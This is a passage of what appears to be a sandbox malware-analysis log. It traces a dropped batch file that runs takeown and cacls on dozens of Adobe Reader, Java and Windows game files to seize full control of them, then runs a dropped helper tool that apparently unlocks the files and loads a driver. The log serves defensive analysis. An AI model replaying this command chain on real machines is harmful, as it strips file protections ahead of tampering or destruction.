- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:968
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""
  2⤵
  PID:1788
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C
    3⤵
    PID:1392
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"
    3⤵
    - Modifies file permissions
    PID:1808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "ENUtxt.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1712
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "ENUtxt.pdf" -nobanner
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:540
    - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m64.exe
        
        ITjElT8m.exe -accepteula "ENUtxt.pdf" -nobanner
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:1436
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""
  2⤵
  - Loads dropped DLL
  PID:900
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C
    3⤵
    PID:780
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
    3⤵
    - Modifies file permissions
    PID:2040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "DefaultID.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:944
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "DefaultID.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:432
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1156
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""
  2⤵
  - Loads dropped DLL
  PID:1088
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C
    3⤵
    PID:1276
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"
    3⤵
    - Modifies file permissions
    PID:872
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "AdobeID.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:804
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "AdobeID.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1692
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1744
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""
  2⤵
  - Loads dropped DLL
  PID:1808
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C
    3⤵
    PID:1500
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"
    3⤵
    PID:744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "Dynamic.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:832
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "Dynamic.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:592
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1664
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""
  2⤵
  - Loads dropped DLL
  PID:772
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"
    3⤵
    - Modifies file permissions
    PID:1908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "SignHere.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1916
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "SignHere.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:636
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1092
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""
  2⤵
  - Loads dropped DLL
  PID:604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C
    3⤵
    PID:900
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"
    3⤵
    PID:336
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1648
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1696
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:908
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""
  2⤵
  - Loads dropped DLL
  PID:1392
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:1088
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"
    3⤵
    - Modifies file permissions
    PID:2036
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "classes.jsa" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1100
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:1500
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1716
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""
  2⤵
  - Loads dropped DLL
  PID:1368
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:1808
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "classes.jsa" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1732
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:1912
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:432
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png""
  2⤵
  - Loads dropped DLL
  PID:1532
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" /E /G Admin:F /C
    3⤵
    PID:1772
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "FreeCellMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1724
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "FreeCellMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:1844
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1692
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png""
  2⤵
  - Loads dropped DLL
  PID:1496
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" /E /G Admin:F /C
    3⤵
    PID:1100
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2000
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "HeartsMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1720
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "HeartsMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:984
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1364
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png""
  2⤵
  - Loads dropped DLL
  PID:1524
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png" /E /G Admin:F /C
    3⤵
    PID:1116
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "MahjongMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:432
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "MahjongMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:968
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:772
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files\Microsoft Games\Chess\ChessMCE.png""
  2⤵
  - Loads dropped DLL
  PID:940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Chess\ChessMCE.png" /E /G Admin:F /C
    3⤵
    PID:900
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Chess\ChessMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "ChessMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1692
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "ChessMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:1128
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1292
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png""
  2⤵
  - Loads dropped DLL
  PID:1176
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png" /E /G Admin:F /C
    3⤵
    PID:268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "SpiderSolitaireMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1580
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "SpiderSolitaireMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:2044
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1148
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png""
  2⤵
  - Loads dropped DLL
  PID:908
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png" /E /G Admin:F /C
    3⤵
    PID:592
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "SolitaireMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1720
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "SolitaireMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:1676
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1500
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png""
  2⤵
  - Loads dropped DLL
  PID:1740
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png" /E /G Admin:F /C
    3⤵
    PID:2040
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "PurblePlaceMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:968
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "PurblePlaceMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:432
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1984
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html""
  2⤵
  - Loads dropped DLL
  PID:660
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" /E /G Admin:F /C
    3⤵
    PID:1276
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html"
    3⤵
    - Modifies file permissions
    PID:872
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "license.html" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1648
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "license.html" -nobanner
      4⤵
      Executes dropped EXE
      PID:1080
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1128
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""
  2⤵
  - Loads dropped DLL
  PID:328
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C
    3⤵
    PID:1752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"
    3⤵
    PID:584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "cryptocme2.sig" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1532
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "cryptocme2.sig" -nobanner
      4⤵
      Executes dropped EXE
      PID:1588
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1544
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""
  2⤵
  - Loads dropped DLL
  PID:1660
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C
    3⤵
    PID:752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"
    3⤵
    - Modifies file permissions
    PID:1392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "add_reviewer.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:592
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "add_reviewer.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1364
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1920
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif""
  2⤵
  - Loads dropped DLL
  PID:2036
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif" /E /G Admin:F /C
    3⤵
    PID:2032
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif"
    3⤵
    - Modifies file permissions
    PID:1972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "forms_received.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1368
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "forms_received.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:716
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:432
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""
  2⤵
  - Loads dropped DLL
  PID:772
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C
    3⤵
    PID:636
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"
    3⤵
    - Modifies file permissions
    PID:900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "reviews_super.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1276
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "reviews_super.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:872
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1080
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif""
  2⤵
  - Loads dropped DLL
  PID:1692
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif" /E /G Admin:F /C
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif"
    3⤵
    PID:812
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "submission_history.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1480
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "submission_history.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:940
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:336
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H""
  2⤵
  - Loads dropped DLL
  PID:1392
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" /E /G Admin:F /C
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1148
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "Identity-H" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1948
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "Identity-H" -nobanner
      4⤵
      Executes dropped EXE
      PID:1968
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2032
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf""
  2⤵
  - Loads dropped DLL
  PID:1156
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf" /E /G Admin:F /C
    3⤵
    PID:1664
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf"
    3⤵
    PID:1500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "MinionPro-Regular.otf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:908
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "MinionPro-Regular.otf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1116
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1908
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB""
  2⤵
  - Loads dropped DLL
  PID:900
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB" /E /G Admin:F /C
    3⤵
    PID:1648
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB"
    3⤵
    - Modifies file permissions
    PID:1808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "ZY______.PFB" -nobanner
    3⤵
    - Loads dropped DLL
    PID:772
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "ZY______.PFB" -nobanner
      4⤵
      Executes dropped EXE
      PID:1984
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1748
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx""
  2⤵
  - Loads dropped DLL
  PID:812
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx" /E /G Admin:F /C
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx"
    3⤵
    - Modifies file permissions
    PID:336
- - C:\Windows\SysWOW64\cmd.exe
